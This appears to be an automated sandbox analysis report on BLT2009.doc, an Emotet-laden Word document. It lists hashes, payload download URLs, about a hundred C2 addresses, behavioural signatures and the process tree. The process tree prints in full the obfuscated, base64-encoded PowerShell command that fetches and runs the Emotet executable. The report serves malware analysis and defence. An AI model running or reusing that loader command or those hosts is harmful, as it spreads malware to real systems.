Analysis
-
max time kernel
138s -
max time network
146s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
19-09-2020 13:06
Static task
static1
Behavioral task
behavioral1
Sample
BLT2009.doc
Resource
win7
General
-
Target
BLT2009.doc
-
Size
163KB
-
MD5
3bed1986a9ac94fba68c471fb4bcfc20
-
SHA1
9b8a01bc85ac72c25311bb8b934be6071ffedeb9
-
SHA256
24750ed2a7cbc122fca96df6f6ed3a3b879906272abbbcc636db5a6a441f68d2
-
SHA512
7f9870114bb40a322b3013053505319774d04f20a11840b391c4a668c84f285ccc5ca2df5ad201d6bd7263434483bb7cdb49fadaed74626dfa9625fbeb86617b
Malware Config
Extracted
http://dheeranet.com/Pej/
http://playschoolmatritva.com/cgi-bin/Uh/
http://dikshadayal.com/cgi-bin/Zl78esq/
http://new.mylicense.ca/5aiibj/vS2/
http://nucleokardecistalace.org.br/wp-includes/HviA/
http://britanniacricketleague.com/wp-admin/3qc8lQB/
https://www.hhbiao.com/ro/4Kh/
Extracted
emotet
71.72.196.159:80
134.209.36.254:8080
120.138.30.150:8080
94.23.216.33:80
157.245.99.39:8080
137.59.187.107:8080
94.23.237.171:443
61.19.246.238:443
156.155.166.221:80
50.35.17.13:80
153.137.36.142:80
91.211.88.52:7080
209.141.54.221:8080
185.94.252.104:443
174.45.13.118:80
87.106.136.232:8080
62.75.141.82:80
213.196.135.145:80
188.219.31.12:80
82.80.155.43:80
187.161.206.24:80
172.91.208.86:80
124.41.215.226:80
107.5.122.110:80
200.123.150.89:443
95.179.229.244:8080
83.169.36.251:8080
1.221.254.82:80
95.213.236.64:8080
181.169.34.190:80
47.144.21.12:443
203.153.216.189:7080
89.216.122.92:80
84.39.182.7:80
94.200.114.161:80
104.236.246.93:8080
139.99.158.11:443
176.111.60.55:8080
78.24.219.147:8080
220.245.198.194:80
62.30.7.67:443
139.162.108.71:8080
104.32.141.43:80
153.232.188.106:80
93.147.212.206:80
79.137.83.50:443
96.249.236.156:443
24.43.99.75:80
75.80.124.4:80
42.200.107.142:80
110.5.16.198:80
5.196.74.210:8080
110.145.77.103:80
200.114.213.233:8080
85.152.162.105:80
5.39.91.110:7080
109.74.5.95:8080
140.186.212.146:80
37.187.72.193:8080
97.82.79.83:80
139.130.242.43:80
201.173.217.124:443
123.176.25.234:80
104.131.44.150:8080
74.208.45.104:8080
139.59.60.244:8080
120.150.60.189:80
74.219.172.26:80
219.75.128.166:80
82.225.49.121:80
85.105.205.77:8080
24.179.13.119:80
74.120.55.163:80
174.102.48.180:443
219.74.18.66:443
168.235.67.138:7080
194.187.133.160:443
78.187.156.31:80
103.86.49.11:8080
61.92.17.12:80
24.137.76.62:80
104.131.11.150:443
79.98.24.39:8080
75.139.38.211:80
162.241.242.173:8080
195.251.213.56:80
37.139.21.175:8080
46.105.131.79:8080
50.91.114.38:80
121.124.124.40:7080
74.134.41.124:80
68.188.112.97:80
137.119.36.33:80
121.7.127.163:80
87.106.139.101:8080
94.1.108.190:443
169.239.182.217:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2808 3208 powershell.exe -
Emotet Payload 8 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/1308-16-0x00000000021C0000-0x00000000021D2000-memory.dmp emotet behavioral2/memory/1308-16-0x00000000021C0000-0x00000000021D2000-memory.dmp emotet behavioral2/memory/1308-17-0x00000000004C0000-0x00000000004D0000-memory.dmp emotet behavioral2/memory/1308-17-0x00000000004C0000-0x00000000004D0000-memory.dmp emotet behavioral2/memory/1652-20-0x00000000005F0000-0x0000000000602000-memory.dmp emotet behavioral2/memory/1652-20-0x00000000005F0000-0x0000000000602000-memory.dmp emotet behavioral2/memory/1652-21-0x00000000001F0000-0x0000000000200000-memory.dmp emotet behavioral2/memory/1652-21-0x00000000001F0000-0x0000000000200000-memory.dmp emotet -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 21 2808 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
Kvc2gdn.exentmarta.exepid process 1308 Kvc2gdn.exe 1652 ntmarta.exe -
Drops file in System32 directory 1 IoCs
Processes:
Kvc2gdn.exedescription ioc process File opened for modification C:\Windows\SysWOW64\AdmTmpl\ntmarta.exe Kvc2gdn.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3740 WINWORD.EXE 3740 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exentmarta.exepid process 2808 powershell.exe 2808 powershell.exe 2808 powershell.exe 1652 ntmarta.exe 1652 ntmarta.exe 1652 ntmarta.exe 1652 ntmarta.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2808 powershell.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXEpid process 3740 WINWORD.EXE 3740 WINWORD.EXE 3740 WINWORD.EXE 3740 WINWORD.EXE 3740 WINWORD.EXE 3740 WINWORD.EXE 3740 WINWORD.EXE 3740 WINWORD.EXE 3740 WINWORD.EXE 3740 WINWORD.EXE 3740 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
powershell.exeKvc2gdn.exedescription pid process target process PID 2808 wrote to memory of 1308 2808 powershell.exe Kvc2gdn.exe PID 2808 wrote to memory of 1308 2808 powershell.exe Kvc2gdn.exe PID 2808 wrote to memory of 1308 2808 powershell.exe Kvc2gdn.exe PID 1308 wrote to memory of 1652 1308 Kvc2gdn.exe ntmarta.exe PID 1308 wrote to memory of 1652 1308 Kvc2gdn.exe ntmarta.exe PID 1308 wrote to memory of 1652 1308 Kvc2gdn.exe ntmarta.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\BLT2009.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encod JABNAHUAcQB4AGoAcwBiAD0AKAAoACcAQwAnACsAJwBiADEAJwApACsAKAAnAG0ANwAnACsAJwBfADAAJwApACkAOwAmACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AVgA6AHUAcwBlAHIAcABSAE8AZgBJAEwAZQBcAEQARgBiAHEAbQBLADUAXABBAF8AagB6ADQATwA1AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQByAEUAQwB0AE8AcgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAGAAUgBgAEkAdABZAHAAcgBgAE8AYABUAE8AQwBPAGwAIgAgAD0AIAAoACcAdABsACcAKwAnAHMAMQAnACsAJwAyACcAKwAoACcALAAgAHQAbAAnACsAJwBzADEAMQAnACsAJwAsACAAdAAnACkAKwAnAGwAcwAnACkAOwAkAEsAagA5ADcAbwBiAGsAIAA9ACAAKAAoACcASwAnACsAJwB2AGMAJwApACsAKAAnADIAZwBkACcAKwAnAG4AJwApACkAOwAkAEMANQBfADUAagBpADUAPQAoACcATAAnACsAJwBfAHAAJwArACgAJwA1ACcAKwAnAHYAeQBnACcAKQApADsAJABMADgAMQBfADUAcwA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHQAOQAnACsAKAAnADEAJwArACcARABmAGIAcQAnACkAKwAnAG0AawAnACsAKAAnADUAJwArACcAdAA5ADEAQQAnACsAJwBfACcAKQArACgAJwBqAHoAJwArACcANABvACcAKwAnADUAdAA5ACcAKQArACcAMQAnACkALQBDAHIAZQBwAGwAYQBjAEUAKAAnAHQAJwArACcAOQAxACcAKQAsAFsAYwBIAEEAUgBdADkAMgApACsAJABLAGoAOQA3AG8AYgBrACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABDAHkAbgBsAHYAcgBiAD0AKAAoACcAQQA4AGoAaAAnACsAJwBtAGMAJwApACsAJwAzACcAKQA7ACQARQBhAGoANwB0ADAAcgA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgB3AEUAYgBjAGwASQBFAE4AdAA7ACQAWABhAHkAZAB3ADQANgA9ACgAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAGQAJwArACcAaABlAGUAcgBhAG4AZQAnACkAKwAoACcAdAAnACsAJwAuAGMAJwApACsAJwBvACcAKwAoACcAbQAvACcAKwAnAFAAJwApACsAKAAnAGUAagAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAHAAbABhACcAKwAnAHkAcwBjACcAKQArACgAJwBoAG8AJwArACcAbwBsAG0AYQB0AHIAJwArACcAaQAnACkAKwAoACcAdAB2AGEAJwArACcALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AJwArACcAYwBnAGkAJwArACcALQBiAGkAbgAvACcAKQArACcAVQAnACsAKAAnAGgAJwArACcALwAqAGgAJwApACsAJwB0ACcAKwAoACcAdAAnACsAJwBwADoAJwApACsAKAAnAC8ALwBkACcAKwAnAGkAawAnACkAKwAoACcAcwBoAGEAJwArACcAZABhACcAKQArACgAJwB5AGEAJwArACcAbAAuAGMAJwApACsAKAAnAG8AJwArACcAbQAnACsAJwAvAGMAZwBpAC0AJwApACsAKAAnAGIAaQAnACsAJwBuAC8AWgAnACkAKwAoACcAbAA3ADgAJwArACcAZQBzACcAKQArACgAJwBxAC8AKgBoAHQAJwArACcAdABwADoALwAnACsAJwAvAG4AJwApACsAKAAnAGUAJwArACcAdwAuAG0AJwArACcAeQBsAGkAJwApACsAKAAnAGMAJwArACcAZQBuACcAKQArACgAJwBzACcAKwAnAGUALgBjAGEAJwApACsAKAAnAC8ANQAnACsAJwBhACcAKQArACgAJwBpACcAKwAnAGkAYgAnACkAKwAoACcAagAvAHYAUwAnACsAJwAyAC8AKgAnACsAJwBoAHQAdAAnACsAJwBwADoAJwApACsAKAAnAC8AJwArACcALwBuACcAKQArACcAdQBjACcAKwAoACcAbAAnACsAJwBlAG8AJwApACsAJwBrAGEAJwArACgAJwByAGQAZQBjAGkAJwArACcAcwB0ACcAKwAnAGEAbABhACcAKwAnAGMAJwApACsAKAAnAGUAJwArACcALgBvACcAKQArACgAJwByAGcALgAnACsAJwBiAHIAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgAnACsAJwBjAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8ASAAnACsAJwB2ACcAKwAoACcAaQBBACcAKwAnAC8AJwApACsAKAAnACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAOgAnACsAJwAvAC8AJwApACsAKAAnAGIAJwArACcAcgBpACcAKQArACgAJwB0ACcAKwAnAGEAbgAnACkAKwAoACcAbgBpACcAKwAnAGEAYwAnACkAKwAoACcAcgAnACsAJwBpAGMAawBlAHQAJwApACsAJwBsACcAKwAoACcAZQBhAGcAdQBlAC4AYwBvAG0AJwArACcALwAnACsAJwB3ACcAKwAnAHAALQBhAGQAbQBpACcAKwAnAG4AJwApACsAJwAvACcAKwAnADMAcQAnACsAKAAnAGMAJwArACcAOABsACcAKQArACgAJwBRAEIAJwArACcALwAqAGgAJwArACcAdAB0AHAAJwApACsAKAAnAHMAJwArACcAOgAvAC8AdwB3AHcAJwApACsAKAAnAC4AaABoAGIAaQBhACcAKwAnAG8ALgBjAG8AJwArACcAbQAvACcAKQArACcAcgAnACsAKAAnAG8ALwA0ACcAKwAnAEsAaAAnACkAKwAnAC8AJwApAC4AIgBzAFAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEUAbAB1AHAAcwBoAGUAPQAoACcARwAxACcAKwAoACcAOAAnACsAJwA3AHUAZgAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASgAxAF8AaAA3AGkAdQAgAGkAbgAgACQAWABhAHkAZAB3ADQANgApAHsAdAByAHkAewAkAEUAYQBqADcAdAAwAHIALgAiAGQAbwBXAG4ATABgAE8AYABBAEQAZgBgAEkAbABlACIAKAAkAEoAMQBfAGgANwBpAHUALAAgACQATAA4ADEAXwA1AHMAOAApADsAJABMAHAAeAB0ADEAYwB1AD0AKAAnAFUAOQAnACsAKAAnADUAbQAwACcAKwAnAHcAJwApACsAJwB4ACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABMADgAMQBfADUAcwA4ACkALgAiAGwAYABFAG4AYABnAHQAaAAiACAALQBnAGUAIAAyADcANAA0ADQAKQAgAHsALgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAoACQATAA4ADEAXwA1AHMAOAApADsAJABBAHgAawBkADIAZgA3AD0AKAAoACcATQBjACcAKwAnADcAJwApACsAKAAnAHUAZwAnACsAJwByACcAKQArACcANwAnACkAOwBiAHIAZQBhAGsAOwAkAE4AMwA5AHAAaQB5AGUAPQAoACcAWQAnACsAJwB5ACcAKwAoACcAdgBvACcAKwAnADQAOAB4ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABOAHgAdQBzAHIAeQB6AD0AKAAnAFQAXwAnACsAKAAnAGkAJwArACcAXwB5AGIAJwApACsAJwB3ACcAKQA=1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe"C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\AdmTmpl\ntmarta.exe"C:\Windows\SysWOW64\AdmTmpl\ntmarta.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\DFbqmK5\A_jz4O5\Kvc2gdn.exe
-
C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe
-
C:\Windows\SysWOW64\AdmTmpl\ntmarta.exe
-
memory/1308-13-0x0000000000000000-mapping.dmp
-
memory/1308-17-0x00000000004C0000-0x00000000004D0000-memory.dmpFilesize
64KB
-
memory/1308-16-0x00000000021C0000-0x00000000021D2000-memory.dmpFilesize
72KB
-
memory/1652-21-0x00000000001F0000-0x0000000000200000-memory.dmpFilesize
64KB
-
memory/1652-20-0x00000000005F0000-0x0000000000602000-memory.dmpFilesize
72KB
-
memory/1652-18-0x0000000000000000-mapping.dmp
-
memory/2808-12-0x000001F56CDE0000-0x000001F56CDE1000-memory.dmpFilesize
4KB
-
memory/2808-11-0x000001F554630000-0x000001F554631000-memory.dmpFilesize
4KB
-
memory/2808-10-0x00007FFA64200000-0x00007FFA64BEC000-memory.dmpFilesize
9.9MB
-
memory/3740-0-0x00007FFA6B4B0000-0x00007FFA6BB76000-memory.dmpFilesize
6.8MB
-
memory/3740-9-0x000001B11516A000-0x000001B11517B000-memory.dmpFilesize
68KB
-
memory/3740-8-0x000001B11516A000-0x000001B11517B000-memory.dmpFilesize
68KB
-
memory/3740-7-0x000001B11516A000-0x000001B11517B000-memory.dmpFilesize
68KB
-
memory/3740-6-0x000001B11516A000-0x000001B11517B000-memory.dmpFilesize
68KB
-
memory/3740-5-0x000001B1157D0000-0x000001B1157F2000-memory.dmpFilesize
136KB